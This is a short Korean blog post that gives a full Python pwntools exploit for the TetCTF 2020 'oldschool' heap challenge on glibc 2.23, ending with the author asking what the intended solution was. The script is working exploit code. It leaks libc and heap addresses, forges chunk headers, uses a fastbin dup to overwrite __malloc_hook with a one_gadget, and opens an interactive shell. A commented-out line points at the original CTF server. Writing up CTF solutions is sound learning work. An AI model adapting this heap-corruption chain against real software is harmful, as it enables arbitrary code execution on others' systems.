

[ TetCTF ] oldschool

mhibio 2020. 1. 11. 14:56

TetCTF 2020의 heap 문제입니다. (glibc 2.23 기준 풀이이며, 아래 스크립트의 오프셋들은 모두 libc-2.23.so에 묶여 있습니다.)

oldschool


from pwn import *

# Flip on for a full transcript of everything sent/received over the tube.
# context.log_level = 'debug'

# Target binary and the libc it was solved against.  l.sym['__malloc_hook']
# and every hard-coded delta further down are specific to this libc-2.23.so;
# swap in the matching libc (or e.libc for the local loader) if it differs.
# NOTE: this script is written for Python 2 pwntools (str/bytes are mixed
# freely); under Python 3, str() on a p64() payload would send its repr.
e = ELF("./oldschool")
l = ELF("./libc-2.23.so")
# l = e.libc

# Local process by default; the remote() line is the original CTF service.
p = process('./oldschool')
# p = remote("54.157.217.45", 19669)

def add(size, data):
    """Menu option 1: allocate a slot of `size` bytes holding `data`.

    Drives the target over the global tube `p`.  The menu choice goes out
    with a trailing newline, while `size` and `data` are sent raw (no
    newline appended) -- the original kept that distinction, presumably to
    match how the target reads those two fields.  The sleeps pace the
    exchange so the next prompt is fully printed before it is consumed.
    """
    p.sendlineafter(": ", '1')
    sleep(0.3)
    p.sendafter(": ", str(size))
    sleep(0.3)
    # str() is a no-op on a Python 2 str payload; see the note at the top.
    p.sendafter(": ", str(data))
    sleep(0.3)

def edit(idx, data):
    """Menu option 2: overwrite the contents of slot `idx` with `data`.

    Uses the global tube `p`.  The slot index is sent with a newline, the
    payload without one, mirroring add(); the 0.3 s pauses keep the prompt
    handling in lock-step with the target.
    """
    p.sendlineafter(": ", '2')
    sleep(0.3)
    p.sendlineafter(": ", str(idx))
    sleep(0.3)
    p.sendafter(": ", str(data))
    sleep(0.3)

def show(idx):
    """Menu option 3: have the target print slot `idx`.

    Only drives the menu over the global tube `p`; the caller reads and
    parses whatever the target prints afterwards (see the recvuntil()
    calls that follow each show() in the exploit body).
    """
    for answer in ('3', str(idx)):
        p.recvuntil(": ")
        p.sendline(answer)
        sleep(0.3)

def fr(idx):
    """Menu option 4: free slot `idx` on the target (via the global tube `p`).

    Named fr() rather than free() in the original; kept as-is for callers.
    """
    for answer in ('4', str(idx)):
        p.sendlineafter(": ", answer)
        sleep(0.3)

# ---------------------------------------------------------------------------
# Exploit sequence.  Everything below is order-sensitive: each add()/fr()
# changes allocator state, and the "# N" trailers record the slot index the
# target hands back, which is what edit()/show()/fr() take.  All numeric
# deltas are tied to the libc-2.23.so loaded above.
# ---------------------------------------------------------------------------

# Forged chunk metadata: two 0x21 size fields (0x20 | PREV_INUSE) with three
# empty qwords between them, so a pointer can later be planted in that gap
# (see the edit(0, ...) further down).
fake = p64(0) + p64(0x21)
fake += p64(0)*3 + p64(0x21)

add(0x60, fake) # 0
# A 0x200 request is above the fastbin range on 2.23, so freeing it goes via
# the unsorted bin and leaves libc (main_arena) pointers in its fd/bk.
add(0x200, 'a') # 1
add(0x10, 'a') # 2
add(0x10, 'a') # 3

fr(1)

# libc leak: take the same chunk back, writing only a single byte, then show
# it -- the stale fd pointer after that byte gets printed along with it.
add(0x200, 'b') # 1
show(1)

# Read through the 0x7f high byte of the pointer and rebuild the 64-bit value.
# The 0x10 + 66 (= 0x52) delta presumably folds together the main_arena
# offset from __malloc_hook and the low byte overwritten by 'b' (0x62); it was
# derived for this libc build and must be re-derived for any other.
libc = u64(p.recvuntil("\x7f")[-6:].ljust(8, '\x00')) - 0x10 - l.sym['__malloc_hook'] - 66
log.info(hex(libc))


# heap leak: free two 0x10-byte (fastbin-sized) slots so the second's fd
# points at the first, re-allocate both, then show one.  As above, the single
# 'a' (0x61) lands on the low byte of the fd pointer.
fr(2)
fr(3)

add(0x10, 'a') # 2

sleep(0.3)
add(0x10, 'b') # 3

show(2)

# The target prints a slot as "Name: <bytes>"; 6 bytes are enough for a
# user-space address.  -0x61 presumably backs out the clobbered low byte and
# -0x200 rebases to the reference point that all later heap+... offsets use.
p.recvuntil('Name: ')
heap = u64(p.recv(6).ljust(8, '\x00')) - 0x61 -0x200
log.info(hex(heap))

# Plant the heap reference inside slot 0's forged chunk, between the two
# 0x21 headers.
fake = p64(0) + p64(0x21)
fake += p64(heap) + p64(0)*2 + p64(0x21)
edit(0, fake)
#context.log_level = 'debug'

# Zero-size allocations, edits and frees on slots 4-6.  What state this
# leaves the allocator and the target's slot table in is not recoverable from
# the script alone; treat it as set-up for the slot-table corruption below.
# NOTE(review): slot numbering after fr() depends on how the target reuses
# freed indices -- the later fr(9)/edit(8)/fr(7) assume a particular policy.
add(0, '6') # 4
add(0, "6") # 5

edit(4, '6')
fr(5)
add(0, '6') # 5

add(0, '6')
fr(4)
fr(6)
edit(5, '6')

#context.log_level = 'debug'
add(0x10, p64(heap))
add(0x10, 'a')
# Same forged 0x21/0x21 header pair as at the top.
fake = p64(0) + p64(0x21)
fake += p64(0)*3 + p64(0x21)
add(0x60, fake)
# Looks like a forged slot record: a data pointer (heap+0x30) followed by two
# 32-bit fields (0x60 and 10) -- presumably the size and one more field of
# the target's per-slot structure; the layout is inferred from the constants.
add(0x10, p64(heap+0x30)+p32(0x60) +p32(10))

add(0x60, 'a')
fr(9)
# Point slot 0 at heap+0x30 and free it, then free further slots; these
# frees feed the bins that the fastbin-dup below drains.
edit(0, p64(heap+0x30))
fr(0)

fr(3)
edit(8, p64(heap+0x460))
fr(7)

fr(1)
fr(2)

# Fastbin dup into __malloc_hook: the first add() lands on a freed 0x60-byte
# slot and overwrites its fd with __malloc_hook - 0x23 (the usual target,
# where the 0x7f byte of a neighbouring libc pointer passes as a valid size
# field).  Two allocations drain the bin; the third returns memory just
# below the hook, and 19 bytes of padding reach __malloc_hook itself.
add(0x60, p64(libc+l.sym['__malloc_hook']-0x23))
add(0x60, 'a')
add(0x60, 'b')
# 0xf02a4: presumably a one_gadget (execve("/bin/sh")) offset for this
# libc-2.23.so; recompute with one_gadget for any other build.
add(0x60, "A"*19+p64(libc+0xf02a4))

# The hook is now armed; menu option 1 (add) is sent to trigger the next
# malloc() and hence the gadget.
p.recvuntil(": ")
p.send('1')

# Drain whatever the target prints before handing the shell over.
p.recv()
p.recv()

p.interactive()

진짜 인텐디드(intended) 풀이가 뭔지 궁금합니다 ㅠㅠ
